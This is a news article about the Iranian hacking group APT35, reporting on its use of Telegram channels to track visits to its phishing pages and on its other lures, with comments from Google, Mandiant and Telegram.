When the Iranian hacking group APT35 wants to know if one of its digital lures has gotten a bite, all it has to do is check Telegram. Whenever someone visits one of the copycat sites they’ve set up, a notification appears in a public channel on the messaging service, detailing the potential victim’s IP address, location, device, browser, and more. It’s not a push notification; it’s a phish notification.
Google’s Threat Analysis Group outlined the novel technique as part of a broader look at APT35, also known as Charming Kitten, a state-sponsored group that has spent the last several years trying to get high-value targets to click on the wrong link and cough up their credentials. And while APT35 isn’t the most successful or sophisticated threat on the international stage—this is the same group, after all, that accidentally leaked hours of videos of themselves hacking—their use of Telegram stands out as an innovative wrinkle that could pay dividends.
The group uses a variety of approaches to try to get people to visit their phishing pages in the first place. Google outlined a few scenarios it has observed lately: the compromise of a UK university website, a fake VPN app that briefly snuck into the Google Play Store, and phishing emails in which the hackers pretend to be organizers of real conferences, and attempt to entrap their marks through malicious PDFs, Dropbox links, websites, and more.
In the case of the university website, the hackers direct potential victims to the compromised page, which encourages them to log in with the service provider of their choice—everything from Gmail to Facebook to AOL is on offer—to view a webinar. If you enter your credentials, they go straight to APT35, which also asks for your two-factor authentication code. It’s a technique so old it’s got whiskers on it; APT35 has been running it since 2017 to target people in government, academia, national security, and more.
The fake VPN isn’t especially innovative, either, and Google says it booted the app from its store before anyone managed to download it. If anyone had fallen for the ruse, though—or does install it on another platform where it’s still available—the spyware can steal call logs, texts, location data, and contacts.
Frankly, APT35 are not exactly overachievers. While they convincingly impersonated officials from the Munich Security conference and Think-20 Italy in recent years, that too is straight out of Phishing 101. “This is a very prolific group that has a wide target set, but that wide target set is not representative of the level of success the actor has,” says Ajax Bash, security engineer at Google TAG. “Their success rate is actually very low.”
Charming Kitten didn't limit itself to classy conference pages, according to security firm Mandiant, which also observed its use of Telegram in July. "The actors created malicious webpages masquerading as an adult content website and a free audio/video calling and instant messenger software," Mandiant associate analyst Emiel Haeghebaert and senior principal analyst Sarah Jones wrote in an emailed comment. “The landing pages profiled visitors to the page and sent information on the visitors back to a Telegram channel that we suspect the threat actors monitored.”
Hackers have abused Telegram before. In April, security firm Check Point found that the platform was being used as part of the command and control infrastructure for malware it called ToxicEye. And the company has taken plenty of flack for its failure to keep extremists and scammers off its channels. But while APT35’s use of Telegram bots as a notification service is less extreme than those abuses, it’s also much harder to proactively detect.
“The content in question is seemingly random messages that do not contain visible signs of abuse,” says Telegram spokesperson Mike Ravdonikas. “They could be anything, e.g., some programmer debugging their code.” Telegram says it took down all the bots and channels as soon as Google reported them, along with “similar public channels and bots we were able to identify thanks to the report,” says Ravdonikas. But unless you can connect a list of IP addresses and so on to an active phishing campaign, he adds, you can’t say with certainty that a bot broadcasting them has malicious intent.
The good news is that APT35 likely isn’t coming after you, unless you work in an industry rife with sensitive information. Its new twist on phishing alerts, though, could give it and copycat criminal hackers one more edge in a fight that’s already unfair.